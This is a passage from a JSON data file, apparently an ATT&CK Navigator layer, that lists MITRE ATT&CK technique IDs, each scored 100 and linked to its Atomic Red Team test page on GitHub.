yco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"},{"techniqueID":"T1055.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"},{"techniqueID":"T1055","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"},{"techniqueID":"T1056.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"},{"techniqueID":"T1056.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"},{"techniqueID":"T1056.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1056","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"},{"techniqueID":"T1057","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"},{"techniqueID":"T1059.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/ato
mic-red-team/blob/master/atomics/T1059.001/T1059.001.md"},{"techniqueID":"T1059.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"},{"techniqueID":"T1059.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1059","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"},{"techniqueID":"T1069.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"},{"techniqueID":"T1069.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1069","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"},{"techniqueID":"T1070.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"},{"techniqueID":"T1070.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"},{"techniqueID":"T1070.004","score":100,"enabled":true,"comment":"https://github.co
m/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"},{"techniqueID":"T1070.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"},{"techniqueID":"T1070.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"},{"techniqueID":"T1070","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"},{"techniqueID":"T1071.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"},{"techniqueID":"T1071.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1071","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"},{"techniqueID":"T1072","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"},{"techniqueID":"T1074.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1074","score":100,"enabled":true,"comment":"https://github.com/redca
naryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"},{"techniqueID":"T1078.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"},{"techniqueID":"T1078.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1078","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"},{"techniqueID":"T1082","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"},{"techniqueID":"T1083","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"},{"techniqueID":"T1087.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.001/T1087.001.md"},{"techniqueID":"T1087.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1087","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/T1087.002.md"},{"techniqueID":"T1090.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1090","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1090.001/T1090.001.md"},{"techniqueID":"T1095","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/
atomic-red-team/blob/master/atomics/T1095/T1095.md"},{"techniqueID":"T1098","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"},{"techniqueID":"T1105","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"},{"techniqueID":"T1106","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"},{"techniqueID":"T1110.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"},{"techniqueID":"T1110.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"},{"techniqueID":"T1110.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1110","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"},{"techniqueID":"T1112","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"},{"techniqueID":"T1113","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"},{"techniqueID":"T1114.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"},{"techniqueID":"T1114","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.0
01/T1114.001.md"},{"techniqueID":"T1115","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"},{"techniqueID":"T1119","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"},{"techniqueID":"T1120","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"},{"techniqueID":"T1123","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"},{"techniqueID":"T1124","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"},{"techniqueID":"T1127.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1127","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"},{"techniqueID":"T1132.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1132","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"},{"techniqueID":"T1133","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"},{"techniqueID":"T1134.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"},{"techniqueID":"T1134.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1134","s
core":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"},{"techniqueID":"T1135","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"},{"techniqueID":"T1136.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"},{"techniqueID":"T1136.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1136","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"},{"techniqueID":"T1137.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"},{"techniqueID":"T1137.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"},{"techniqueID":"T1137.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"},{"techniqueID":"T1137","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"},{"techniqueID":"T1140","score":1
00,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"},{"techniqueID":"T1176","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"},{"techniqueID":"T1197","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"},{"techniqueID":"T1201","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"},{"techniqueID":"T1202","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"},{"techniqueID":"T1204.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1204","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"},{"techniqueID":"T1207","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"},{"techniqueID":"T1216.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"},{"techniqueID":"T1216","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"},{"techniqueID":"T1217","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"},{"techniqueID":"T1218.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/ato
mic-red-team/blob/master/atomics/T1218.001/T1218.001.md"},{"techniqueID":"T1218.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"},{"techniqueID":"T1218.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"},{"techniqueID":"T1218.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"},{"techniqueID":"T1218.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"},{"techniqueID":"T1218.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"},{"techniqueID":"T1218.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"},{"techniqueID":"T1218.009","score":100,"enabled":true,"comment":"https://github.co
m/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"},{"techniqueID":"T1218.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"},{"techniqueID":"T1218.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"},{"techniqueID":"T1218","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"},{"techniqueID":"T1219","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"},{"techniqueID":"T1220","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"},{"techniqueID":"T1221","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"},{"techniqueID":"T1222.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1222","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"},{"techniqueID":"T1482","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"},{"techniqueID":"T1485","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/mast
er/atomics/T1485/T1485.md"},{"techniqueID":"T1486","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"},{"techniqueID":"T1489","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"},{"techniqueID":"T1490","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"},{"techniqueID":"T1491.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1491","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"},{"techniqueID":"T1497.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1497","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"},{"techniqueID":"T1505.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"},{"techniqueID":"T1505.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1505","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"},{"techniqueID":"T1518.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1
518.001.md"},{"techniqueID":"T1518","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"},{"techniqueID":"T1529","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"},{"techniqueID":"T1531","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"},{"techniqueID":"T1543.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1543","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"},{"techniqueID":"T1546.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"},{"techniqueID":"T1546.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"},{"techniqueID":"T1546.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"},{"techniqueID":"T1546.007","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"},{"
techniqueID":"T1546.008","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"},{"techniqueID":"T1546.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"},{"techniqueID":"T1546.011","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"},{"techniqueID":"T1546.012","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"},{"techniqueID":"T1546.013","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1546","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"},{"techniqueID":"T1547.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"},{"techniqueID":"T1547.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/
T1547.004.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"},{"techniqueID":"T1547.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"},{"techniqueID":"T1547.009","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"},{"techniqueID":"T1547.010","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1547","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"},{"techniqueID":"T1548.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1548","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"},{"techniqueID":"T1550.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"},{"techniqueID":"T1550.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"},{"techniqueID":"T1550","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomi
cs/T1550.003/T1550.003.md"},{"techniqueID":"T1552.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"},{"techniqueID":"T1552.002","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"},{"techniqueID":"T1552.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"},{"techniqueID":"T1552.006","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1552","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"},{"techniqueID":"T1553.004","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"},{"techniqueID":"T1553.005","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1553","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"},{"techniqueID":"T1555.003","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/
